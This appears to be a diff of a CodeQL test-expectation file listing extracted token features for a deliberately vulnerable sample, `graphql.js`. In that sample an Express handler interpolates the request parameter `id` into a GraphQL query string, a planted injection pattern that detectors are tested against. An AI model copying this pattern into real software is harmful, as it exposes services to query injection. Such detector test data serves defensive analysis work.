autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:24:42:71 | "token ... 000001" | InputArgumentIndex | 1 | @@ -296,6 +1956,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:24:42:71 | "token ... 000001" | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:24:42:71 | "token ... 000001" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:24:42:71 | "token ... 000001" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:11 | query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:11 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:11 | query | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:11 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:11 | query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:7:44:24 | query: `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:14:44:24 | `foo ${id}` | CalleeFlexibleAccessPath | request | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:14:44:24 | `foo ${id}` | InputAccessPathFromCallee | 1.query | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:14:44:24 | `foo ${id}` | InputArgumentIndex | 1 | @@ -306,6 +1981,58 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:14:44:24 | `foo ${id}` | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:14:44:24 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:14:44:24 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:15:44:18 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:15:44:18 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:15:44:18 | foo | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:15:44:18 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:15:44:18 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:15:44:18 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:21:44:22 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:21:44:22 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:21:44:22 | id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:21:44:22 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:21:44:22 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:44:21:44:22 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:22 | withDefaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:22 | withDefaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:22 | withDefaults | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:22 | withDefaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:22 | withDefaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDef ... lts({}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDef ... lts({}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDef ... lts({}) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDef ... lts({}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDef ... lts({}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDefaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDefaults | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDefaults | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDefaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:11:47:45 | withDefaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:32 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:32 | request | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:32 | request | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:32 | request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:32 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:41 | request.defaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:41 | request.defaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:41 | request.defaults | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:41 | request.defaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:41 | request.defaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | exceptional return of request.defaults({}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | exceptional return of request.defaults({}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | exceptional return of request.defaults({}) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | exceptional return of request.defaults({}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | exceptional return of request.defaults({}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | request.defaults({}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | request.defaults({}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | request.defaults({}) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | request.defaults({}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:26:47:45 | request.defaults({}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:34:47:41 | defaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:34:47:41 | defaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:34:47:41 | defaults | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:34:47:41 | defaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:34:47:41 | defaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:43:47:44 | {} | CalleeFlexibleAccessPath | request.defaults | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:43:47:44 | {} | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:43:47:44 | {} | calleeImports | @octokit/request | @@ -315,6 +2042,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:43:47:44 | {} | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:43:47:44 | {} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:47:43:47:44 | {} | receiverName | request | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:16 | withDefaults | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:16 | withDefaults | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:16 | withDefaults | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:16 | withDefaults | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:16 | withDefaults | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | exceptional return of withDef ... id}` }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | exceptional return of withDef ... id}` }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | exceptional return of withDef ... id}` }) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | exceptional return of withDef ... id}` }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | exceptional return of withDef ... id}` }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | withDef ... id}` }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | withDef ... id}` }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | withDef ... id}` }) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | withDef ... id}` }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:5:48:57 | withDef ... id}` }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:18:48:32 | "POST /graphql" | CalleeFlexibleAccessPath | withDefaults | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:18:48:32 | "POST /graphql" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:18:48:32 | "POST /graphql" | calleeImports | @octokit/request | @@ -331,6 +2073,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:35:48:56 | { query ... {id}` } | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:35:48:56 | { query ... {id}` } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:35:48:56 | { query ... {id}` } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:41 | query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:41 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:41 | query | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:41 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:41 | query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:37:48:54 | query: `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:44:48:54 | `foo ${id}` | CalleeFlexibleAccessPath | withDefaults | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:44:48:54 | `foo ${id}` | InputAccessPathFromCallee | 1.query | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:44:48:54 | `foo ${id}` | InputArgumentIndex | 1 | @@ -341,6 +2098,70 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:44:48:54 | `foo ${id}` | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:44:48:54 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:44:48:54 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:45:48:48 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:45:48:48 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:45:48:48 | foo | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:45:48:48 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:45:48:48 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:45:48:48 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:51:48:52 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:51:48:52 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:51:48:52 | id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:51:48:52 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:51:48:52 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:48:51:48:52 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:1:51:48 | import ... /rest"; | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:1:51:48 | import ... /rest"; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:1:51:48 | import ... /rest"; | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:16 | Octokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:16 | Octokit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:16 | Octokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:24 | Core | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:24 | Core | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:24 | Core | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:24 | Octokit as Core | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:24 | Octokit as Core | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:10:51:24 | Octokit as Core | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:21:51:24 | Core | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:21:51:24 | Core | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:21:51:24 | Core | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:33:51:47 | "@octokit/rest" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:33:51:47 | "@octokit/rest" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:51:33:51:47 | "@octokit/rest" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:10 | kit2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:10 | kit2 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:10 | kit2 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:10 | kit2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:23 | kit2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:23 | kit2 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:23 | kit2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:23 | kit2 = new Core() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:23 | kit2 = new Core() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:7:52:23 | kit2 = new Core() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:14:52:23 | exceptional return of new Core() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:14:52:23 | exceptional return of new Core() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:14:52:23 | exceptional return of new Core() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:14:52:23 | new Core() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:14:52:23 | new Core() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:14:52:23 | new Core() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:18:52:21 | Core | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:18:52:21 | Core | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:52:18:52:21 | Core | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:54:3 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:54:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:54:3 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:54:7 | app.get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:54:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:54:7 | app.get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:59:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:59:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:59:2 | app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:59:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:59:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:1:59:2 | exceptional return of app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:5:54:7 | get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:5:54:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:5:54:7 | get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:9:54:21 | '/event/:id/' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:9:54:21 | '/event/:id/' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:9:54:21 | 